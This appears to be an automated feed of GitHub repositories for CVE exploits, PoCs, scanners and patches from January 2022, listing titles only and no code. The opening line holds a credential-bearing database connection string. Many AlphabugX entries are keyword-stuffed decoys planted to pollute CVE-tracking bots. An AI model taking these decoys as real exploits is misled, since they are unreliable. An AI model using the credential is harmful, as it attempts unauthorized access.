cve update exploit poc rce sqli code cve-2022-1160 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-1160 create time: 2022-01-21T06:41:17Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20019 create time: 2022-01-21T05:45:10Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20020 create time: 2022-01-21T05:45:10Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20023 create time: 2022-01-21T05:45:10Z

POC for cve-2022-21658 : sagittarius-a/cve-2022-21658 create time: 2022-01-21T06:09:16Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23112 create time: 2022-01-21T05:47:41Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23094 create time: 2022-01-21T05:47:39Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23120 create time: 2022-01-21T05:47:38Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20618 create time: 2022-01-21T05:47:38Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23083 create time: 2022-01-21T05:47:38Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23314 create time: 2022-01-21T05:47:38Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23408 create time: 2022-01-21T05:47:37Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23435 create time: 2022-01-21T05:47:37Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23132 create time: 2022-01-21T05:47:36Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23307 create time: 2022-01-21T05:47:36Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23221 create time: 2022-01-21T05:47:36Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23219 create time: 2022-01-21T05:47:36Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23315 create time: 2022-01-21T05:47:36Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23302 create time: 2022-01-21T05:47:36Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23109 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23117 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-22893 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23218 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23222 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-22891 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23304 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23107 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23303 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23305 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23227 create time: 2022-01-21T05:47:35Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23133 create time: 2022-01-21T05:47:34Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23114 create time: 2022-01-21T05:47:34Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23134 create time: 2022-01-21T05:47:34Z

image\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23178 create time: 2022-01-21T05:47:34Z

test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC : AlphabugX/CVE-2022-23305 create time: 2022-01-21T05:07:59Z

CVE-2021-32099 SQLi allow attacker bypass login : l3eol3eo/CVE-2021-32099_SQLi create time: 2022-01-21T02:43:20Z

no description : Haxatron/CVE-2022-0219 create time: 2022-01-20T14:24:45Z

// SPDX-FileCopyrightText: Portions Copyright 2021 Siemens // Modified on 15-Jul-2021 by Siemens and/or its affiliates to fix CVE-2018-1311: Apache Xerces-C use-after-free vulnerability scanning external DTD. Copyright 2021 Siemens. : johnjamesmccann/xerces-3.2.3-DTD-hotfix create time: 2022-01-20T13:43:38Z

no description : LazyTitan33/CVE-2021-32790-PoC create time: 2022-01-20T11:38:09Z

no description : semelnyk/CVE-2021-44228-ScannersListFromRF create time: 2022-01-20T10:34:48Z

Testing WAF protection against CVE-2021-44228 : robrankin/cve-2021-44228-waf-tests create time: 2022-01-20T09:30:44Z

Patch your code for October CMS Auth Bypass CVE-2021-32648 : daftspunk/CVE-2021-32648 create time: 2022-01-20T09:28:13Z

It is a nmap script for GravCMS vulnerability (CVE-2021-21425) : frknktlca/GravCMS_Nmap_Script create time: 2022-01-19T17:54:19Z

It is a nmap script for metabase vulnerability (CVE-2021-41277) : frknktlca/Metabase_Nmap_Script create time: 2022-01-19T17:43:38Z

💀 Linux local root exploit CVE-2018-18955 : scheatkode/CVE-2018-18955 create time: 2022-01-19T14:47:47Z

Exploit for CVE-2021-25741 vulnerability : Betep0k/CVE-2021-25741 create time: 2022-01-19T14:05:20Z

CVE-2022-0185 : Crusaders-of-Rust/CVE-2022-0185 create time: 2022-01-19T06:19:38Z

no description : aymenbouferroum/CVE-2021-43798_exploit create time: 2022-01-18T21:04:39Z

Finds an identifiable hash value for each version of GitLab vulnerable to CVE-2021-22205 (https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json) for use in fingerprinting. : GitLab-Red-Team/cve-2021-22205-hash-harvester create time: 2022-01-18T20:40:55Z

Exploit for CVE-2021-32099 : nikn0laty/CVE-2021-32099_exploit create time: 2022-01-18T19:29:55Z

POC for Infamous Log4j CVE-2021-44228 : ColdFusionX/CVE-2021-44228-Log4Shell-POC create time: 2022-01-18T19:22:38Z

cf8-upload.py | CVE-2009-2265 : 0zvxr/CVE-2009-2265 create time: 2022-01-14T17:34:28Z

Apache log4j2 CVE-20210-44228 poc : c4dr01d/CVE-2021-44228-poc create time: 2021-12-23T03:18:26Z

no description : x41sec/CVE-2021-34600 create time: 2022-01-17T16:08:17Z

Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers : p0dalirius/CVE-2022-21907-http.sys create time: 2022-01-17T15:42:37Z

no description : fimtow/CVE-2021-24750 create time: 2022-01-14T21:19:43Z

本项目并不刻意搜集 POC 或 EXP,主要以CVE-2022为关键词,包含但不限于漏洞资讯、漏洞复现、漏洞分析、漏洞验证、漏洞利用 : binganao/vulns-2022 create time: 2022-01-15T00:31:06Z

Terraform and Docker resources for quickly spinning up a test of CVE-2021-4428 : z3bul0n/log4jtest create time: 2022-01-18T00:09:11Z

WordPress Core 5.8.2 - 'WP_Query' SQL Injection : TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection create time: 2022-01-18T01:05:04Z

Apache Dubbo Hessian2 CVE-2021-43297 demo : longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 create time: 2022-01-17T17:52:34Z

A simple script to check for ProxyShell : jrgdiaz/ProxyShell-CVE-2021-34473 create time: 2022-01-17T15:12:58Z

CVE-2022-21907 : xiska62314/CVE-2022-21907 create time: 2022-01-17T13:42:44Z

Static detection of vulnerable log4j librairies on Windows members of an AD domain. : arnaudluti/PS-CVE-2020-44228 create time: 2022-01-17T12:46:20Z

CVE-2022-21907 : xiska62314/CVE-2022-21907 create time: 2022-01-17T13:18:08Z

CVE-2022-0236 : xiska62314/CVE-2022-0236 create time: 2022-01-17T12:56:19Z

CVE-2021-43297 POC : bitterzzZZ/CVE-2021-43297-POC create time: 2022-01-17T12:26:18Z

no description : KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability create time: 2022-01-17T08:45:28Z

no description : nazgul6092/2nd-Year-Project-01-Linux-Exploitation-using-CVE-20166-5195 create time: 2022-01-15T13:30:15Z

no description : artsking/linux-4.19.72_CVE-2020-14386_extrapatch create time: 2022-01-17T03:55:23Z

测试各位cve检测的灵敏性 : Fanc1er/CVE-2022-21918 create time: 2022-01-17T03:20:44Z

Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907 : antx-code/CVE-2022-21907 create time: 2022-01-17T02:28:50Z

no description : qurbat/CVE-2022-0236 create time: 2022-01-16T09:52:28Z

This repo contains dumped flash partitions with firmware version vulnerable to CVE-2019-17147, and some useful binaries to downgrade and debug your WR841N router. : DrmnSamoLiu/CVE-2019-17147_Practice_Material create time: 2022-01-16T07:08:57Z

An exploit/PoC for CVE-2021-42237 : PinkDev1/CVE-2021-42237 create time: 2022-01-16T05:22:30Z

CVE-2021-28476: Hyper-V vmswitch.sys arbitrary pointer dereference from guest VM : australeo/CVE-2021-28476 create time: 2022-01-16T02:45:26Z

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired. : mauricelambert/CVE-2022-21907 create time: 2022-01-15T20:50:25Z

CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability. : plsanu/CVE-2021-46080 create time: 2022-01-14T21:45:58Z

CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection. : plsanu/CVE-2021-46079 create time: 2022-01-14T21:26:02Z

CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability. : plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS create time: 2021-12-28T18:23:42Z

CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection. : plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection create time: 2021-12-28T18:17:36Z

CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability. : plsanu/CVE-2021-46078 create time: 2022-01-14T20:49:42Z

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution. : plsanu/CVE-2021-46076 create time: 2022-01-14T20:28:01Z

CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability. : plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting create time: 2021-12-28T15:35:20Z

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution. : plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution create time: 2021-12-28T15:00:17Z

CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations. : plsanu/CVE-2021-46075 create time: 2022-01-14T20:15:28Z

CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel. : plsanu/CVE-2021-46074 create time: 2022-01-14T20:01:50Z

CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. : plsanu/CVE-2021-46073 create time: 2022-01-14T19:49:07Z

CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel. : plsanu/CVE-2021-46072 create time: 2022-01-14T19:34:50Z

CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations. : plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations create time: 2021-12-28T14:46:13Z

CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel. : plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:37:00Z

CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. : plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:29:44Z

CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel. : plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:22:43Z

CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel. : plsanu/CVE-2021-46071 create time: 2022-01-14T19:09:36Z

CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel. : plsanu/CVE-2021-46070 create time: 2022-01-14T18:54:29Z

CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. : plsanu/CVE-2021-46069 create time: 2022-01-14T18:27:00Z

CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel. : plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:09:54Z

CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel. : plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:00:52Z

CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. : plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T13:47:59Z

CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. : plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS create time: 2021-12-27T22:07:08Z

CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover. : plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover create time: 2021-12-27T21:15:41Z

CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating. : plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS create time: 2021-12-19T17:54:55Z

CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating. : plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS create time: 2021-12-19T17:50:15Z

CVE-2021-46068 : plsanu/CVE-2021-46068 create time: 2022-01-14T18:04:01Z

CVE-2021-46067 : plsanu/CVE-2021-46067 create time: 2022-01-14T17:19:09Z

CVE-2021-45745 : plsanu/CVE-2021-45745 create time: 2022-01-14T16:52:08Z

This Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability : jrocia/Search-log4Jvuln-AppScanSTD create time: 2022-01-14T16:47:20Z

Proof Of Concept code for OctoberCMS Auth Bypass CVE-2021-32648 : Immersive-Labs-Sec/CVE-2021-32648 create time: 2022-01-14T15:50:11Z

CVE-2021-45744 : plsanu/CVE-2021-45744 create time: 2022-01-14T15:36:21Z

no description : puckiestyle/CVE-2018-16341 create time: 2022-01-14T13:38:04Z

For code auit and CVE-2020-21378 repetition : sukusec301/SeaCMS-v10.1- create time: 2022-01-14T11:17:26Z

no description : BishopFox/CVE-2021-35211 create time: 2022-01-14T05:52:17Z

JWT Key Confusion PoC (CVE-2015-9235) Written for the Hack the Box challenge - Under Construction : aalex954/jwt-key-confusion-poc create time: 2022-01-13T23:09:13Z

This work includes testing and improvement tools for CVE-2021-44228(log4j). : sdogancesur/log4j_github_repository create time: 2022-01-13T21:16:26Z

CVE-2021-44228 : eliadbz/log4shell create time: 2022-01-13T20:26:24Z

CVE-2021-38141 in OpenEMPI 4.04 : connellmcg/CVE-2021-38141 create time: 2022-01-13T16:19:45Z

no description : solitarysp/Log4j-CVE-2021-44228 create time: 2022-01-13T13:46:12Z

Script - Workaround instructions to address CVE-2021-44228 in vCenter Server : Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228 create time: 2021-12-17T05:14:05Z

POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Injection Vulneralibity. : antx-code/CVE-2021-26084 create time: 2022-01-13T06:29:51Z

A potential Denial of Service issue in protobuf-java high severity GitHub Reviewed Published 5 days ago in protocolbuffers/protobuf • Updated yesterday Vulnerability details Dependabot alerts 2 Package com.google.protobuf:protobuf-java (maven) Affected versions < 3.16.1 >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.16.1 3.18.2 3.19.2 Package com.google.protobuf:protobuf-kotlin (maven) Affected versions >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.18.2 3.19.2 Package google-protobuf (RubyGems) Affected versions < 3.19.2 Patched versions 3.19.2 Description Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: OSS-Fuzz Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf "javalite" users (typically Android) are not affected. Severity CVE-2021-22569 High - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.16.1, 3.18.2, 3.19.2) protobuf-kotlin (3.18.2, 3.19.2) google-protobuf [JRuby gem only] (3.19.2) References GHSA-wrvw-hg22-4m67 https://nvd.nist.gov/vuln/detail/CVE-2021-22569 https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330 https://cloud.google.com/support/bulletins#gcp-2022-001 : Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java create time: 2022-01-13T03:33:54Z

Explanation of CVE-2021-45046 for classroom use : taise-hub/log4j-poc create time: 2022-01-13T03:02:47Z

This repository was created with the purpose to make it easy for organizations and individuals to study and research log4jshell vulnerability code name CVE-2021-44228. : adamtheapiguy/log4jshellPoC create time: 2022-01-13T01:53:17Z

no description : artsking/linux-4.19.72_CVE-2020-14386 create time: 2022-01-13T02:05:23Z

Démo du fonctionnement de log4shell (CVE-2021-44228) : jxerome/log4shell create time: 2022-01-12T23:44:20Z

School project - Please use other repos for actual testing : norrig/CVE-2021-41773-exploiter create time: 2022-01-12T17:42:36Z

no description : SABI-Ensimag/CVE-2019-18276 create time: 2022-01-12T11:40:57Z

CVE-2021-32099 : ibnuuby/CVE-2021-32099 create time: 2022-01-12T11:48:34Z

no description : artsking/linux-4.19.72_CVE-2020-14386 create time: 2022-01-12T10:41:44Z

CVE-2020-15261 test : yaoyao-cool/CVE-2020-15261 create time: 2022-01-12T10:00:39Z

no description : aazhuliang/CVE-2021-31956-EXP create time: 2022-01-11T16:03:38Z

cups-root-file-read.sh | CVE-2012-5519 : 0zvxr/CVE-2012-5519 create time: 2022-01-07T15:39:47Z

Powershell implemetation of CVE-2020-7352 : szerszen199/PS-CVE-2020-7352 create time: 2022-01-05T00:11:58Z

Just for HTB : zjicmDarkWing/CVE-2021-32099 create time: 2022-01-11T08:14:06Z

Experimental exploit for Log4Shell : c4dr01d/CVE-2021-44228 create time: 2022-01-10T04:55:23Z

a cve crawler for 2021 : song856854132/scrapy_CVE2021 create time: 2022-01-09T15:39:53Z

no description : Nivaskumark/CVE-2021-40490_kernel_v4.19.72 create time: 2022-01-11T05:42:58Z

no description : Nivaskumark/CVE-2021-0434_packages_apps_Settings create time: 2022-01-11T05:14:06Z

no description : Nivaskumark/CVE-2021-0434_packages_apps_Settings_beforefix create time: 2022-01-11T04:51:23Z

Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104. : open-AIMS/log4j create time: 2022-01-10T09:01:46Z

CVE-2021-44228 : mr-vill4in/log4j-fuzzer create time: 2022-01-08T00:28:32Z

An exploit for CVE-2021-20038 : jbaines-r7/badblood create time: 2022-01-11T02:25:25Z

no description : marcinguy/CVE-2021-39623 create time: 2022-01-10T19:25:28Z

no description : Veids/CVE-2020-3452_auto create time: 2022-01-10T16:56:40Z

CVE-2022-21660 : UzJu/Gin-Vue-admin-poc-CVE-2022-21660 create time: 2022-01-10T05:50:35Z

CVE-2021-41277 can be extended to an SSRF : sasukeourad/CVE-2021-41277_SSRF create time: 2022-01-10T01:52:10Z

no description : cryptoforcecommand/log4j-cve-2021-44228 create time: 2022-01-09T08:22:24Z

no description : gnaiq/cve-2022-2222 create time: 2022-01-10T02:23:06Z

no description : cybersecurityworks553/CVE-2021-42392-Detect create time: 2022-01-09T16:23:16Z

This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce : maximofernandezriera/CVE-2021-44228 create time: 2022-01-09T13:38:38Z

no description : MichaelsPlayground/CVE-2019-9465 create time: 2022-01-08T22:25:43Z

2022年Java应用程序的CVE漏洞 : HackJava/CVE2022 create time: 2022-01-08T15:28:02Z

no description : alexpena5635/CVE-2021-44228_scanner-main-Modified- create time: 2022-01-05T00:14:08Z

一键批量检测poc : yggcwhat/CVE-2021-45232 create time: 2022-01-08T08:16:06Z

CVE-2021-45232批量一键检测 : yggcwhat/Demo create time: 2022-01-08T07:42:43Z

CVE-2021-44270 : pinpinsec/Anviz-Access-Control-Authentication-Bypass create time: 2021-11-23T15:04:23Z

no description : 1nf1n17yk1ng/CVE-2018-16763 create time: 2022-01-08T07:15:24Z

A vulnerable Java based REST API for demonstrating CVE-2021-44228 (log4shell). : nix-xin/vuln4japi create time: 2022-01-08T06:45:44Z

no description : rodpwn/CVE-2021-43798-mass_scanner create time: 2022-01-08T02:58:18Z

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. : puzzlepeaches/Log4jHorizon create time: 2022-01-05T22:25:42Z

Log4jshell - CVE-2021-44228 : Vulnmachines/log4jshell_CVE-2021-44228 create time: 2022-01-07T09:56:30Z

CVE-2021-42013-exp : rnsss/CVE-2021-42013 create time: 2022-01-07T03:12:45Z

no description : Yuji-Kakeya/log4j-CVE-2021-45046-poc create time: 2022-01-05T04:13:59Z

Exploiting: CVE-2021-41349 : exploit-io/CVE-2021-41349 create time: 2022-01-06T09:44:15Z

Grafana8.x 任意文件读取 : rnsss/CVE-2021-43798-poc create time: 2022-01-06T09:25:35Z

no description : lsw29475/CVE-2021-39863 create time: 2021-12-12T13:27:16Z

no description : gnaiq/cve2022123 create time: 2022-01-06T07:58:57Z

no description : gnaiq/cve-2022-4444 create time: 2022-01-06T07:22:47Z

no description : Xifeng2009/go_get_cve_2018_6574 create time: 2022-01-06T02:56:07Z

运用golang写的grafana批量验证脚本,内置48个poc : light-Life/CVE-2021-43798 create time: 2022-01-06T01:54:26Z

no description : timb-machine-mirrors/CVE-2021-28482 create time: 2022-01-05T23:26:58Z

no description : timb-machine-mirrors/CVE-2021-22005 create time: 2022-01-05T23:22:08Z

no description : timb-machine-mirrors/CVE-2021-42321_poc create time: 2022-01-05T23:15:55Z

Directory of all CVEs from 2019 to 2021. : reconmap/vulnerability-data create time: 2020-09-25T18:29:45Z

latest developments and resources on log4j vulnerability CVE-2021-44228 : cryptoforcecommand/log4j-CVE-2021-44228 create time: 2022-01-05T21:00:44Z

Log4j2 LDAP 취약점 테스트 (CVE-2021-44228) : mklinkj/log4j2-test create time: 2022-01-03T04:36:41Z

A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 ) : ChandanShastri/Log4j_Vulnerability_Demo create time: 2022-01-05T15:24:20Z

Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384 : nt1dr/CVE-2021-45383 create time: 2022-01-05T12:56:23Z

Backdoor detection for VMware view : mr-r3b00t/CVE-2021-44228 create time: 2022-01-05T11:27:16Z

Config files for my GitHub profile. : cvelez2002/cvelez2002 create time: 2022-01-05T08:33:27Z

no description : Kuibagit/CVE-2021-45232-RCE create time: 2022-01-05T09:07:35Z

A vulnerable web app for log4j2 RCE(CVE-2021-44228) exploit test. : kanitan/log4j2-web-vulnerable create time: 2022-01-05T08:13:32Z

no description : gnaiq/CVE-2022-1234 create time: 2022-01-05T07:07:41Z

CVE-2021-45232-RCE-多线程批量漏洞检测 : GYLQ/CVE-2021-45232-RCE create time: 2022-01-05T04:13:10Z

PoC for CVE-2019-5736 : Frichetten/CVE-2019-5736-PoC create time: 2019-02-13T05:26:32Z

Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List : 4jfinder/4jfinder.github.io create time: 2022-01-04T03:37:03Z

CVE-2021-42342 RCE : Mr-xn/CVE-2021-42342 create time: 2022-01-04T14:48:59Z

no description : w1023913214/CVE-2022 create time: 2022-01-04T13:51:54Z

the name of virus is the detection of microsoft defender, is the tipic antivirus : Malware-S/Exploit-Win32.CVE-2017-0147.A create time: 2022-01-04T10:25:39Z

PoC Site for tsunami-security-scanner-plugins. : PfalzPrince/CVE-2021-28750 create time: 2022-01-04T08:05:03Z

POC for CVE-2021-22214: Gitlab SSRF : kh4sh3i/GitLab-SSRF-CVE-2021-22214 create time: 2022-01-04T05:52:57Z

Atmail XSS-RCE-CSRF Exploit Chain : AndrewTrube/CVE-2012-2593 create time: 2022-01-04T02:47:46Z

Bassmaster Plugin NodeJS RCE : AndrewTrube/CVE-2014-7205 create time: 2022-01-04T02:59:32Z

the name of virus is the detection of microsoft defender, is the tipic antivirus : Malware-S/Exploit-Win32.CVE-2012-0158.F.doc create time: 2022-01-03T21:13:13Z

Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. : LongWayHomie/CVE-2021-43857 create time: 2022-01-03T16:47:42Z

no description : khuntor/cve-2021-43858 create time: 2022-01-03T14:12:35Z

